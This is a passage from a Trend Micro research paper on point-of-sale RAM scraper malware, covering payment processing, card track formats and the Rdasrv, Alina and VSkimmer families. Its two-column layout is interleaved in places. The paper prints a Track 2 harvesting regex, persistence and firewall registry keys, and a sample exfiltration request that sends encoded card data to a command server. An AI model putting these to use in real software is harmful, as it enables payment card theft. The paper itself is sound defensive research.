WP Pos Ram Scraper Malware

Download as pdf or txt
Download as pdf or txt
You are on page 1of 97

A Trend Micro Research Paper

PoS RAM Scraper Malware


Past, Present, and Future

Numaan Huq
Forward-Looking Threat Research Team
Trend Micro | PoS RAM Scraper Malware

CONTENTS

Introduction.....................................................................................................................................1

Payment Card Data Theft.........................................................................................................1

Early Warnings.........................................................................................................................1

Research Overview..................................................................................................................2

Payment-Processing Ecosystem....................................................................................................3

Parties Involved in Credit Card Transactions...........................................................................3

How Credit Cards Are Processed.............................................................................................5

PoS RAM Scraping........................................................................................................................6

Credit Card Data.......................................................................................................................6

PAN and Luhn..........................................................................................................................7

PCI DSS in a Nutshell..............................................................................................................8

Low-Hanging Fruits..................................................................................................................9

PoS RAM Scraper Families..........................................................................................................10

PoS RAM Scraper Evolution..................................................................................................10

TREND MICRO LEGAL DISCLAIMER

The information provided herein is for general information and educational purposes only. It is not intended and should not be construed to constitute legal advice.
The information contained herein may not be applicable to all situations and may not reflect the most current situation. Nothing contained herein should be relied on
or acted upon without the benefit of legal advice based on the particular facts and circumstances presented and nothing herein should be construed otherwise. Trend
Micro reserves the right to modify the contents of this document at any time without prior notice.

Translations of any material into other languages are intended solely as a convenience. Translation accuracy is not guaranteed nor implied. If any questions arise
related to the accuracy of a translation, please refer to the original language official version of the document. Any discrepancies or differences created in the
translation are not binding and have no legal effect for compliance or enforcement purposes.

Although Trend Micro uses reasonable efforts to include accurate and up-to-date information herein, Trend Micro makes no warranties or representations of any kind
as to its accuracy, currency, or completeness. You agree that access to and use of and reliance on this document and the content thereof is at your own risk. Trend
Micro disclaims all warranties of any kind, express or implied. Neither Trend Micro nor any party involved in creating, producing, or delivering this document shall
be liable for any consequence, loss, or damage, including direct, indirect, special, consequential, loss of business profits, or special damages, whatsoever arising
out of access to, use of, or inability to use, or in connection with the use of this document, or any errors or omissions in the content thereof. Use of this information
constitutes acceptance for use in an “as is” condition.
Trend Micro | PoS RAM Scraper Malware

Rdasrv....................................................................................................................................11

Alina........................................................................................................................................13

VSkimmer...............................................................................................................................17

Dexter.....................................................................................................................................23

BlackPOS...............................................................................................................................28

Decebal..................................................................................................................................33

Next-Generation PoS RAM Scrapers...........................................................................................37

JackPOS.................................................................................................................................37

Soraya....................................................................................................................................38

ChewBacca............................................................................................................................38

BrutPOS.................................................................................................................................39

Backoff....................................................................................................................................40

What Will the Next Generation of PoS RAM Scrapers Look Like?..............................................42

General Characteristics..........................................................................................................43

Data Collection.......................................................................................................................46

Data Exfiltration......................................................................................................................49

Infection Methods.........................................................................................................................53

Using a Bag of “Old” Tricks.....................................................................................................53

Inside Jobs........................................................................................................................53

Phishing and Social Engineering......................................................................................53

Vulnerability Exploitation...................................................................................................54

PCI DSS Noncompliance Abuse.......................................................................................56

Cyber Attacks....................................................................................................................56

Underground Credit Card Scene..................................................................................................58

Data-Exfiltration Methods.......................................................................................................58

Data Validation.......................................................................................................................59
Trend Micro | PoS RAM Scraper Malware

Who Are Behind PoS Attacks?...............................................................................................60

Stolen Card Data for Sale.......................................................................................................61

Using Stolen Credit Cards......................................................................................................62

Looking Beyond the Horizon........................................................................................................65

Detection Statistics.................................................................................................................65

Credit Card Data Breaches in the United States....................................................................66

Other Credit Card Data Theft Methods...................................................................................69

New Credit Card Technologies...............................................................................................70

EMV..................................................................................................................................70

Contactless RFID Cards...................................................................................................71

Conclusion and Recommendations..............................................................................................73

Prevention..............................................................................................................................73

Hardware Based...............................................................................................................73

Software Based................................................................................................................73

Policy Based.....................................................................................................................74

Trend Micro Solutions.............................................................................................................74

Conclusion..............................................................................................................................75

Appendix......................................................................................................................................76

References...................................................................................................................................88
Trend Micro | PoS RAM Scraper Malware

INTRODUCTION

Payment Card Data Theft date. The earliest credit-card-data-stealing


malware were primarily keyloggers that,
in most cases, were installed on victims’
Stealing payment card data has become an systems as a payload of other malware or
everyday crime that yields quick monetary through phishing attacks. As effective as
gains. The goal is to steal the data stored on keyloggers are, they cannot capture all of the
the magnetic stripe of payment cards, clone magnetic stripe data on credit cards and yield
the cards, and run charges on the accounts less data than RAM scraping. Two major
associated with them. Criminals have been developments have been seen in credit-card-
physically skimming payment cards such as data-stealing malware and the criminals who
debit and credit cards for a while now. The use them:
common techniques for skimming payment
cards include but are not limited to the • To exponentially increase their
following: payback from stealing credit card
data, criminals are now directly
• Making a rub of payment cards targeting the businesses that process
credit cards instead of going after
• Rigging ATMs or gas pumps with fake
individual victims.
panels that steal data
• Criminals are exploiting the fact that
• Modifying stores’ point-of-sale (PoS)
credit card magnetic stripe data
terminals
temporarily resides in plain text in
the RAM of PoS devices during
• Using off-the-shelf hardware
processing.
keyloggers on cash registers [1]

The techniques mentioned above require Early Warnings


physical access to the cards or the devices
used to process them. As such, criminals The earliest evidence of PoS RAM scraping
face big risks of getting apprehended. Also, was recorded in a Visa® Data Security
skimmers cannot be readily mass-deployed Alert issued on 2 October 2008. [2] Before
for maximum effectiveness. Criminals standalone PoS RAM scraper malware were
have, therefore, resorted to using malicious developed, cybercriminals were attempting
software to steal data primarily from credit to install debugging tools on PoS devices
cards. Such solutions provide them a certain in order to dump entire sets of magnetic
degree of anonymity, are easier to deploy, stripe data. The Visa report revealed that
and are more flexible should they wish to such debugging tools could effectively parse
quickly modify their solutions in order to unencrypted sensitive data not written to
adjust to changing conditions. disk from volatile memory (i.e., RAM). Visa
identified that cybercriminals obtained access
This research paper focuses on credit card to PoS devices through insecure remote
data theft, which makes up the majority of access or poorly configured networks.
the payment card data breaches seen to

1
Trend Micro | PoS RAM Scraper Malware

In 2009, Verizon also introduced PoS RAM Research Overview


scrapers, along with victim profiles. [3] Back
then, the malware only accounted for
4% of the total number of breaches Verizon This research paper examines the
investigated. These primarily targeted PoS ecosystem. It describes how PoS
companies in the retail and hospitality transactions work from the moment
industries. Verizon had a difficult time customers swipe their credit cards to when
classifying the attacks because they were they get charged for their purchases. It
new. In this year’s report, the number of PoS- describes what types of data resides in the
RAM-scraper-related breaches rose to magnetic stripe of payment cards. It looks at
14% of the total and primarily targeted the evolution of PoS RAM scrapers—from
companies in the accommodation, food their humble beginnings to how they have
services, and retail industries. [4] The United become today’s industrialized threats. It
States Computer Emergency Readiness also presents the various PoS RAM scraper
Team (US-CERT) also formally issued an infection methods by providing technical
alert on malware targeting PoS devices on overviews of the most prevalent PoS RAM
2 January 2014, after targeted attacks scraper malware families that have affected
against big name retailers made headlines. businesses to date. It details the data-
[5], [6] The attackers used PoS RAM scrapers
exfiltration techniques used by PoS RAM
to steal credit card data. scrapers and examines what happens to
the data that cybercriminals exfiltrate. It also
attempts to predict future PoS attack vectors.
Finally, the paper provides prevention
strategies that companies can follow to
protect against PoS RAM scrapers.

2
Trend Micro | PoS RAM Scraper Malware

PAYMENT-PROCESSING ECOSYSTEM

Before delving into PoS RAM scraper others whose networks are used
malware analysis, let us first take a look to facilitate interactions between
at the payment-processing ecosystem— acquirers and issuers when
what parties are involved as well as how authorizing and settling transactions.
payment card transactions are authorized
and settled. This will help us understand • Payment service provider (PSP):
existing vulnerabilities in the ecosystem that Third-party service provider that
cybercriminals exploit. handles payment transactions
between merchants and multiple
Parties Involved in Credit Card acquirers. The advantage of using a
PSP is that merchants do not need
Transactions to set up and to maintain dedicated
communication channels with different
A credit card transaction is a multistep acquirers. Such a service is part of
process that involves several other parties, the PSP’s service package offerings.
apart from consumers and merchants.
The following briefly describe the different • Payment switch: In-house or third-
parties involved in credit-card-transaction party service provider that provides
processing: [7], [8], [9], [10] routing services between merchants
and multiple PSPs.
• Consumer: Cardholder who
purchases goods and services with a Consumers swipe their cards on merchants’
credit card. PoS devices to purchase goods and
services. The PoS devices send the credit
• Merchant: Goods and services card data to merchants’ PoS systems.
provider that accepts credit card The PoS systems contact the PSP, who,
payments. depending on what card brand or type was
used, contacts designated acquirers for
• Acquirer: Bank that processes and transaction authorization. Acquirers use the
settles a merchant’s credit card card brands’ networks to contact credit card
transactions with an issuer. issuers. Issuers return an authorization status
to acquirers via card brands’ networks. The
• Issuer: Bank or financial institution acquirers then pass on the authorization to
that issues credit cards to consumers. the PSP who forwards it to the PoS systems
and devices, which complete the transaction.
• Card brand: Visa, MasterCard®, This communication occurs in a matter of
American Express (AMEX)™, and seconds.

3
Trend Micro | PoS RAM Scraper Malware

Merchant’s PoS Merchant’s PoS


Cardholder hardware software

Payment
Issuer service
provider

Credit card Acquirer Acquirer Acquirer Acquirer


brand network A B C D

Figure 1: Transaction flow model for regular merchants

Merchant’s PoS Merchant’s PoS


Cardholder hardware software

Payment
switch

Issuer

Payment Payment Payment


service service service
provider A provider B provider C

Credit card Acquirer Acquirer Acquirer Acquirer


brand network A B C D

Figure 2: Transaction flow model for large merchants

4
Trend Micro | PoS RAM Scraper Malware

Large merchants with high transaction funds via card brands’ networks to
volumes have a slightly different transaction acquirers.
flow model.
• Funding: Acquirers send merchants
Large merchants normally contract multiple payment via PSPs. Issuers then
PSPs in order to support a diverse range of bill cardholders the amount paid to
payment options (e.g., all major debit and merchants plus fees or interest.
credit card brands, gift cards, store-branded
cards, etc.) and to get the best transaction- Data takes on the following states in the
processing rates to reduce operating costs. transaction process:
PoS systems send transaction requests to
payment switches that route requests to the • Data in memory: All of the credit
appropriate PSPs for processing. The rest of card data is temporarily stored in
the process remains unchanged, apart from plain text in the RAM of merchants’
the additional payment switch step. PoS systems during processing.
Cybercriminals use PoS RAM
How Credit Cards Are Processed scrapers to steal this data.

• Data at rest: Merchants’ PoS


Credit card transactions involve the following systems store transaction data for a
basic steps: short period of time (e.g., for batching)
as well as a partial set of data for
• Authorization: Cardholders request a long period of time for record
to purchase goods and/or services purposes in log files or a database.
from merchants by paying for them The data stored is encrypted. There
using credit cards. Merchants submit is no specific encryption algorithm
transaction requests to acquirers via requirement defined in PCI DSS.
PSPs. Acquirers send the transaction Instead, PCI DSS mandates the use
requests via cardholders’ brand of strong cryptography (i.e., minimum
networks to issuers. Issuers return key length of 112 bits). Vendors can
authorization codes via card brands’ choose which encryption algorithm
networks to acquirers. Acquirers then they want to implement to protect the
forward authorization codes via PSPs data as long as the algorithm meets
to merchants. If the transactions the minimum strong cryptography
are authorized, merchants give requirements.
cardholders the goods and/or
services they requested. • Data in transit: The data is internally
transferred over LANs or WANs
• Batching: Merchants store an entire and externally over the Internet.
day’s authorized sales in a batch. Encryption is mandatory for data
At the end of the day, they send the transferred over the Internet but not
batch via PSPs to acquirers in order for information transferred over LANs
to receive payment. or WANs.
• Clearing: Acquirers send the batch Cybercriminals attack transaction data
via card brands’ networks to issuers that resides in memory because it is the
in order to request payment. Card easiest to target. As attacks become more
brands’ networks sort out each sophisticated and larger in scope, data at rest
transaction to the right cardholders. and in transit will also be targeted.
Issuers then transfer requested

5
Trend Micro | PoS RAM Scraper Malware

PoS RAM SCRAPING

Credit Card Data The International Air Transport Association


(IATA) created the Track 1 standard, which is
recorded at 210 bits per inch and contains
The magnetic stripe of payment cards has 79 alphanumeric characters. [12]
three Data Tracks—1, 2, and 3. Payment
cards only use Tracks 1 and 2, which The American Bankers Association (ABA),
have been defined the in International meanwhile, created the Track 2 standard,
Organization for Standardization (ISO)/ which is recorded at 75 bits per inch and
International Electrotechnical Commission contains 40 numeric characters.
(IEC) 7813 as: [11]

Track 1 Standard

SS FC PAN FS CN FS ED SC DD ES LRC

SS: Start sentinel (%)


FC: Format code (B or b)
PAN: Primary account number (up to 19 digits long)
FS: Field separator (^)
CN: Cardholder’s name (up to 26 characters long)
ED: Expiry date (in the form, “YYMM”)
SC: Service code
DD: Discretionary date (may include the Card Verification Value [CVV]/Code, the PIN Verification Value,
and the PIN Verification Key Indicator)
ES: End sentinel (?)
LRC: Longitudinal redundancy check

Track 2 Standard

SS PAN FS ED SC DD ES LRC

SS: Start sentinel (;)


PAN: Primary account number (up to 19 digits long)
FS: Field separator (=)
ED: Expiry date (in the form, “YYMM”)
SC: Service code
DD: Discretionary data (similar to that in Track 1)
ES: End sentinel (?)
LRC: Longitudinal redundancy check

6
Trend Micro | PoS RAM Scraper Malware

Credit cards also contain a three- to four-digit PAN and Luhn


number printed or embossed on either the
front or back side called the “CVV/CVV2,”
“Card Verification Number (CVN),” “Card The Primary Account Number (PAN) format,
Security Code (CSC),” “Card Validation defined in ISO/IEC 7812, is commonly
Code (CVC2),” or some other similar term. 16 digits long but can reach up to 19 digits
Credit-card-issuing institutions have different and has the following format: [13]
names for this number but it is a security
IIII-IIAA-AAAA-AAAC
verification feature used in “card-not-present”
transactions (e.g., made via telephone,
mail order, online, etc.) wherein merchants The first six digits (i.e., Is) are known as
cannot physically verify if cards are present the “Issuer Identification Number (IIN).”
for transactions. Note that, by design, this Its first digit is called the “Major Industry
number is not stored in Tracks 1 and 2 and Identifier (MII).” Major card networks—Visa,
without it, a perfect counterfeit credit card MasterCard, Discover, JCB®, AMEX, and
cannot be created. others—all have unique IIN ranges that
identify which institution issued a card. [14]

Common Card Brand IIN Ranges

IIN Range
Length
Card Brand (Card Number Validation
(Number of Digits)
Starts With)

34
AMEX 15 Luhn
37

54
Diners Club™ 16 Luhn
55

6011
622126‒622925
Discover 16 Luhn
644‒649
65

JCB 3528‒3589 16 Luhn

MasterCard 50‒55 16 Luhn

13
Visa 4 Luhn
16

The length of individual account numbers simple checksum formula, not a


(i.e., As) can vary and reach up to 12 digits. cryptographic hash function, defined in ISO/
The final digit (i.e., C) is a “check” digit IEC 7812 and designed to catch errors in
calculated using the Luhn algorithm—a previous digits of the PAN. All valid credit

7
Trend Micro | PoS RAM Scraper Malware

card numbers must pass the Luhn validation deployed worldwide. At this point, defining,
check. Note, the Luhn algorithm does not developing, and deploying a brand new
verify any other information on the card apart secure technology standard for payment
from the PAN. cards would be extremely expensive.

PoS RAM scrapers generally use regular PCI DSS has the following 12 major
expression (regex) matches to search for and requirements: [16]
harvest Tracks 1 and 2 credit card data from
the process memory space in the RAM. The • Install and maintain a firewall
following is a sample regex to find Track 2 configuration to protect cardholder
data: data.

([0-9]{15,16}[D=](0[7-9]|1[0-5]) • Do not use vendor-supplied defaults


((0[1-9])|(1[0-2]))[0-9]{8,30}) for system passwords and other
security parameters.
Depending on the complexity of the regex,
it can incorrectly capture garbage data • Protect stored cardholder data.
from the RAM in addition to valid card
• Encrypt cardholder data when
data. A well-defined regex will return clean
transmitted across open, public
results but may be computationally more
networks.
expensive compared with a looser one. If
the cybercriminals’ goal is to quickly capture
• Protect all systems against malware
data from the RAM, efficiency is more
and regularly update anti-malware
important than quality. To circumvent bad
solutions.
data problems, some PoS RAM scrapers
implement Luhn validation to check the • Develop and maintain secure systems
card data harvested prior to exfiltration. and applications.
Cybercriminals have also been known to use
cracked commercial data loss prevention • Restrict access to cardholder data on
(DLP) products that merchants use for a need-to-know basis.
Payment Card Industry (PCI) compliance
for validating exfiltrated data offline before • Identify and authenticate access to
selling it in underground forums. system components.

PCI DSS in a Nutshell • Restrict physical access to cardholder


data.
PCI Data Security Standard (PCI DSS) refers
• Track and monitor all access to
to a set of requirements designed to ensure
network resources and cardholder
that all companies that process, store, or
data.
transmit credit card information maintain a
secure environment. [15] • Regularly test security systems and
processes.
PCI DSS does not offer new secure
technologies to protect electronic payment • Maintain policies that address
systems but provides requirements to information security for all personnel.
build up layers of security control around
existing ones. PCI DSS v1.0 was published The merchants and vendors in every PoS
in December 2004, long after electronic transaction chain are ultimately responsible
payment systems were developed and

8
Trend Micro | PoS RAM Scraper Malware

for implementing PCI DSS. Lack of federated abusing PCI DSS noncompliance, and others
implementation of PCI DSS means that to infect PoS systems.
payment systems are often insecure even if
they are theoretically PCI compliant. Merchants and vendors in the PoS
transaction chain are responsible for
Low-Hanging Fruits implementing PCI DSS. Note that merchants
are most susceptible to PoS RAM scraper
infections, as they are in the front line
Cybercriminals have found low-hanging of customer payment processing. Small
fruits for grabs within this layered security merchants such as small stores, independent
framework—unencrypted credit card data. retail outlets, neighborhood grocery stores,
After merchants swipe credit cards, the data and the like do not always possess the
stored on them temporarily resides in plain technical know-how to properly implement
text in the PoS software’s process memory or manage PCI DSS and so can become
space in the RAM. PoS RAM scrapers susceptible to targeted attacks. The only
retrieve a list of running processes and caveat for cybercriminals when targeting
load-inspects each process’s memory for small merchants is that they do not net
card data. They run searches on the process big card data volumes. Big merchants, on
memory space and can retrieve entire sets the other hand, have their own IT security
of Tracks 1 and 2 credit card data. The real departments and are PCI DSS compliant but
challenge lies in finding a reliable method are also lucrative targets for bigger payoffs.
to infect PoS systems with RAM scrapers. The end of 2013 showed that carefully
Cybercriminals use a variety of tried-and- planned targeted attacks could successfully
tested infection methods such as insider jobs, breach the IT defenses and steal credit card
spamming or phishing, social engineering, data from the PoS systems of even big name
credential theft, lateral movement from retailers.
existing infections, software exploitation,

9
Trend Micro | PoS RAM Scraper Malware

PoS RAM SCRAPER FAMILIES

PoS RAM Scraper Evolution can exfiltrate stolen card data to


remote servers.
The earliest evidence of PoS RAM scraping • Bot functionality: Malware with this
was the Visa Data Security Alert issued on feature can receive commands from
2 October 2008. Back then, cybercriminals command-and-control (C&C) servers.
attempted to install debugging tools on PoS
systems to dump Tracks 1 and 2 credit card • Kill switch functionality: This
data from RAM. PoS RAM scrapers have feature allows C&C servers to instruct
quickly evolved since then to include: bots to uninstall malware, effectively
removing all traces of a breach.
• Multiple components: Today’s
attacks use several components that • Encryption: Today’s malware encrypt
each performs a specialized function. the data that they exfiltrate.

• Single binary: All of the necessary • Development kits: These allow


functionality come packaged in a anyone to create customized binaries
single binary. that they can then use to breach
victims’ systems.
• Networking functionality: Today’s
malware have additional networking • Multiple exfiltration techniques: A
functionality (e.g., File Transfer single binary can use several data-
Protocol [FTP], Tor, HTTP, etc.) and exfiltration techniques.

Dexter Soraya

Backoff

ALINA
Alina JackPOS

Rdasrv BrutPOS

BlackPOS
ver.2

BlackPOS VSkimmer ChewBacca Decebal

2012 2013 2014


Figure 3: PoS RAM scraper family tree

10
Trend Micro | PoS RAM Scraper Malware

Rdasrv Regexes to match Tracks 1 and 2 credit


card data that are hardcoded in the malware
binary run on the process memory content
Rdasrv—one of the earliest PoS RAM that Rdasrv reads.
scrapers—was first discovered at the end
of 2011. [17] It has no specific family name Tracks 1 and 2 credit card data scraped from
so it is called by the service name that the process memory are written to disk in a
it installs—rdasrv. Trend Micro detects file called “data.txt” or “current.txt.” Because
Rdasrv binaries as BKDR_HESETOX.SVC, Rdasrv does not have data-exfiltration
TSPY_POCARDL.BD, TSPY_POCARDL.AJ, functionality, the data file is most likely
TROJ_BANKER.QPA, and TROJ_BANKER. manually removed or retrieved via remote
DPS. [18] access.
When first executed, the malware is installed Rdasrv has been designed to target
as a service called “rdasrv.” Name variations companies in the food services and
exist but rdasrv is most commonly used. The hospitality industries. As previously
sample analyzed installed a service called mentioned, it only inspects process names
“rdpclip.” The installer script executes the for PoS software that are hardcoded in its
malware using the /install parameter. The binary. The PoS processes that Rdasrv
malware then passes function cc_data_ targets include:
scraper_main to StartServiceCtrlDispatcher.
The cc_data_scraper_main function registers • ifs.exe: MICROS Restaurant
itself to handle service control requests using Enterprise Solution (RES)
RegisterServiceCtrlHandler. The malware
is now installed and ready to scrape the • ccs.exe: MICROS RES
process memory for Tracks 1 and 2 credit
card data. • utg2.exe: Shift4 credit-card-
processing application
Unlike most PoS RAM scrapers, Rdasrv
does not inspect all or even a subset of all • edcsvr.exe: Aloha Electronic Draft
of the running processes. It only inspects Capture (EDC) PoS Restaurant
process names that have been hardcoded System
in its binary. It iterates over all of the running
processes and uses a string-compare Rdasrv has various versions hardcoded
function to match target process names. If a with different target process names, most
target process is found, it calls OpenProcess probably because cybercriminals collect
using the PROCESS_ALL_ACCESS flag information about their targets’ operating
to obtain a handle then reads the memory’s environments before dispatching customized
content via ReadProcessMemory. binaries.

11
Trend Micro | PoS RAM Scraper Malware

Figure 4: Rdasrv passes cc_data_scraper_main to StartServiceCtrlDispatcher

Figure 5: Process that looks for target processes—ccs.exe and ifs.exe

Figure 6: Regexes used to match Tracks 1 and 2 credit card data

Figure 7: Rdasrv writes the data to data.txt

12
Trend Micro | PoS RAM Scraper Malware

Rdasrv Files Analyzed

SHA-1 Trend Micro Detection Name

05492b4f4d6b819d54809ebca0980da133067e89 TSPY_POCARDL.BD

61395ad59bbb111aa2a84ccd1e1cb4da3c38211a TROJ_BANKER.QPA

df74d626df43247fdcd380bbc37b68f48b8c11d4 BKDR_HESETOX.SVC

daee813c73d915c53289c817e4aadaa6b8e1fb96 BKDR_HESETOX.SVC

2440cf33693651458b209b91e05d6466e4dc25dd TSPY_POCARDL.AJ

fb59188d718f7392e27c4efb520dceb8295a794f BKDR_HESETOX.SVC

06a0f4ed13f31a4d291040ae09d0d136d6bb46c3 BKDR_HESETOX.SVC

b8c1f7d28977e80550fcbaf2c10b222caea53be8 TSPY_BANKER.DPS

48db3a315d9e8bc0bce2c99cfde3bb9224af3dce BKDR_HESETOX.SVC

Alina randomly selects a name from this list


and copies itself to the %APPDATA%
directory using the chosen filename.
Alina is a well-known PoS RAM scraper that It also adds the filepath to an Auto
was first discovered sometime in Start runkey to remain persistent. The
October 2012. [19] The Alina source code is sample analyzed installed itself as
actively developed and is regularly updated. java.exe and executed the following
Its latest known version is 6.x. actions:
When first executed, Alina installs itself on • Add java.exe to the %APPDATA%
victims’ systems. It follows this step-by-step directory
installation process:
• Add the following key to the
1. It checks if an Alina code update is registry:
available for download. It then checks
for and removes any existing Alina HKEY_CURRENT_USER\Software\
code on victims’ systems. It then Microsoft\Windows\CurrentVersion\
prepares to install the latest version of Run\java value: %APPDATA%\java.exe
the code available or itself.
3. The final step in the Alina installation
2. Alina has a list of socially engineered
process executes the copy in the
filenames hardcoded in its binary. It
%APPDATA% directory using the

13
Trend Micro | PoS RAM Scraper Malware

alina=<original_alina> parameter. Once regex matching in the process


The sample analyzed executed the memory is complete, Alina retrieves the next
following action via the application process recorded in the snapshot using
programming interface (API) call: Process32Next and the inspection cycle is
repeated. Alina uses HTTP POST to exfiltrate
CreateProcessA ARGs:(%APPDATA%\ the Tracks 1 and 2 data that it scrapes and
java.exe, alina=%WorkingDir%\ sends it to C&C servers, the addresses of
4E682B34C3E122E55D21F9A501B9F13AF which are hardcoded in its binary. HTTP
B7437A9_samp.exe,,,,,,,,1776
POST requests are used because they are
not cached, not saved in history, and have no
This step terminates the original data-sending length restrictions.
Alina process and deletes the
associated file on disk, completing The format that Alina uses when exfiltrating
the installation. Alina is now ready data has significantly changed since it was
to scrape the process memory for first released. [20] Earlier versions sent
Tracks 1 and 2 credit card data. Note exfiltrated data as plain text. Later on, the
that every time infected systems data was XOR-encrypted with a key and the
reboot, the Alina binary reinstalls encrypted data was encoded as hexadecimal
itself. digits. For a while, Alina required C&C
servers to respond with a status code before
Alina inspects running processes on infected initiating data exfiltration. The Alina binary
systems via the CreateToolhelp32Snapshot is hardcoded with several C&C server
method that PoS RAM scrapers commonly addresses. If a server is unresponsive or
use. It calls CreateToolhelp32Snapshot fails to return the expected status code, the
to take a snapshot of all of the processes malware contacts the next server in the list.
currently running on the system as well as It also sends victims’ computer and user
the heaps, modules, and threads that they information, along with exfiltrated credit
use. It then calls Process32First, which card data, to C&C servers. Alina version 5.x
retrieves information about the first process encrypts exfiltrated data using two different
encountered in the snapshot. The process keys. The header block of the exfiltrated data
memory for certain programs such as is XOR-encrypted with one key while the
Firefox®, Skype, Chrome™, and others can header contains the second key that the rest
dramatically increase in size during runtime. of the data is XOR-encrypted with.
Finding Tracks 1 and 2 credit card data in a
browser’s process memory is computationally Alina is a general-purpose PoS RAM scraper
expensive and highly unlikely. Because of compared with Rdasrv because it does not
this, Alina maintains a blacklist of processes restrict itself to targeting a handful of known
to skip. If the current process is not in the PoS applications. It can be deployed, without
blacklist, Alina opens a process object using being customized, to a wider pool of victims,
OpenProcess and reads the memory content most likely via social engineering. A steady
via ReadProcessMemory. Regexes to match stream of code updates and new functionality
Tracks 1 and 2 data, which are hardcoded strongly imply that the Alina codebase is
in the Alina binary, are run on the process maturing and that the malware is enjoying
memory content that Alina reads. recurring success.

14
Trend Micro | PoS RAM Scraper Malware

Figure 8: Alina checks for updates and deletes existing infectors

Figure 9: Process blacklist and socially engineered filename list

15
Trend Micro | PoS RAM Scraper Malware

CreateToolhelp32Snapshot

Process32First

Blacklist No OpenProcess

ReadProcessMemory No

Yes
Scrape process memory
for credit card data

Process32Next Blacklist

Yes

Figure 10: CreateToolhelp32Snapshot method flowchart

Figure 11: Regexes used to match Tracks 1 and 2 credit card data

16
Trend Micro | PoS RAM Scraper Malware

Figure 12: Alina submits the scraped data to a remote server via HTTP POST

Alina Files Analyzed

SHA-1 Trend Micro Detection Name

4e682b34c3e122e55d21f9a501b9f13afb7437a9 BKDR_ALINA.KER

5563e4c2987eda056b3f74716c00d3014b9306bc BKDR_ALINA.NA

a368829bc400284f1803f4e5de5844ae4ccdedf1 BKDR_ALINA.OJ

aadb31534bd276fa2f3029e89e93140a48a5ce0d BKDR_ALINA.ON

2e3e8a3454262016d1d453c702a0dc8b42e29d5f TROJ_INJECT.AWH

VSkimmer

Due to the growing popularity of PoS RAM


scrapers as a tool for quick monetary gain,
development kits promptly started surfacing
in the cybercriminal underground. VSkimmer
is a popular WYSIWYG builder tool for PoS
RAM scrapers that surfaced around the
beginning of 2013. [20], [21], [22]

Figure 13: VSkimmer’s builder interface

17
Trend Micro | PoS RAM Scraper Malware

The VSkimmer tool has an easy-to-configure unlikely. If the current process is not in the
builder interface. The user-configured blacklist, VSkimmer opens the process
parameters are applied to a stub file that object using OpenProcess and reads the
comes bundled with the builder in order memory content via ReadProcessMemory.
to generate a customized executable file. The sample we analyzed only has the regex
The builder appends a section called “_ to match Track 2 credit card data hardcoded
Xyl2k_” to the stub. The sample built was in its binary, however, other versions may
configured with the remote server address, have regexes to match both Tracks 1 and 2
www . myexampleserver . co . cc, and renamed credit card data. The regex to match Track 2
to java.exe. credit card data runs on the process memory
content that VSkimmer reads.
When first executed, the malware copies
itself to the %APPDATA% directory using When the regex matching on the process
the user-configured filename, java.exe. memory is completed, VSkimmer retrieves
It adds itself to an Auto Start runkey with the next process recorded in the snapshot
the user-configured name, PCI Compliant using Process32Next and the inspection
SCard. It also adds itself to the firewall as cycle is repeated. The malware implements
an authorized application via the following two data-exfiltration methods. Online, it uses
registry keys: HTTP GET to exfiltrate the Tracks 1 and 2
credit card data that it scrapes and sends it
HKEY_LOCAL_MACHINE\SOFTWARE\ to a user-configured C&C server address.
Microsoft\Windows\CurrentVersion\ Most PoS RAM scrapers use HTTP POST
Run\PCI Compliant SCard value: unlike VSkimmer, which uses HTTP GET.
%APPDATA%\java.exe
The stolen card data is encoded as a Base64
string and is appended to the user-configured
HKEY_LOCAL_MACHINE\SYSTEM\ URL path, /api/process.php?xy=.
ControlSet001\Services\
SharedAccess\Parameters\ The following is a sample HTTP GET request
FirewallPolicy\StandardProfile\ to a C&C server:
AuthorizedApplications\
List\%APPDATA%\java.exe http://www.myexampleserver.co.cc/
api/process.php?xy=NDAwMDAwMDAwMDA
VSkimmer is now ready to scrape the wMDAwMj0xNTA0MTAxMTAwMDA0ND##
process memory for Tracks 1 and 2 credit
card data. It inspects running processes VSkimmer also has manual data-exfiltration
using the CreateToolhelp32Snapshot method functionality. If infected systems are
that PoS RAM scrapers commonly use. offline, it looks for a removable drive called
“KARTOXA007” (i.e., user-configurable drive
VSkimmer calls CreateToolhelp32Snapshot name) and dumps all of the credit card data it
to take a snapshot of all of the currently harvests in a file called “dmpz.log” (i.e., user-
running processes on the system as well configurable filename) on the drive. If a C&C
as the heaps, modules, and threads that server cannot be reached and no removable
they use. It then calls Process32First, which drives are connected to the infected systems,
retrieves information about the first process the data is dumped in a text file called
encountered in the snapshot. It maintains a “compliant.dat.”
blacklist of processes (e.g., smss.exe, csrss.
exe, winlogon.exe, etc.) to skip because VSkimmer also has bot functionality. It can
finding credit card data in the process receive and parse the commands, upd and
memory space of those processes is highly dlx, from C&C servers. The upd command

18
Trend Micro | PoS RAM Scraper Malware

tells infected systems to send a status update table—terminals—tracks infected systems’


to servers. The dlx command, meanwhile, locations, volume, status, bot version
tells infected systems to download and number, users, OSs, and others. The
execute a file passed as a parameter to cmdresults table tracks bots’ status, while
the command. Cybercriminals can use the commands table tracks tasks assigned to
the dlx command to update the bot or to bots.
download other malicious software onto
already-infected systems. The VSkimmer WYSIWYG builders such as VSkimmer
builder package comes with a server-side have industrialized PoS-RAM-scraper
bot management portal. VSkimmer’s bot generation, making the malware mainstream
management portal accesses and populates and opening up more possibilities for data
a SQL database through the Web interface. breaches.
The database has three tables—cmdresults,
commands, and terminals. The top-level

Figure 14: Appended section called “_Xyl2k_”

19
Trend Micro | PoS RAM Scraper Malware

Figure 15: CreateToolhelp32Snapshot method code flow

20
Trend Micro | PoS RAM Scraper Malware

Figure 16: VSkimmer reads the process memory and searches for Track 2 credit card data

Figure 17: VSkimmer encodes stolen data as a Base64 string and appends it to a user-configured URL
path

21
Trend Micro | PoS RAM Scraper Malware

Figure 18: VSkimmer’s database schema

VSkimmer Files Analyzed

SHA-1 Trend Micro Detection Name

8b7e8d5ddd0c3ac657d358df7f70090204efb9e1 TROJ_HESETOX.D

fc7528e8dced7d70d92923b645c51885ac652e1e TSPY_POCARDL.DAM

d541441ed4d475e79e95c8c7f550a24922c3ffdb BKDR_HESETOX.SMJ

31dad731919e20c0cb3ce98efc01daea4ac34f21 TSPY_POCARDL.AK

22
Trend Micro | PoS RAM Scraper Malware

Dexter the Local Machine Zone using the


following registry keys:
Dexter variants, first discovered in HKCU\Software\Microsoft\Windows\
December 2012, steal more than just CurrentVersion\Internet Settings\
Tracks 1 and 2 credit card data from infected Zones\0\1806 value: 0
systems. They also steal system information
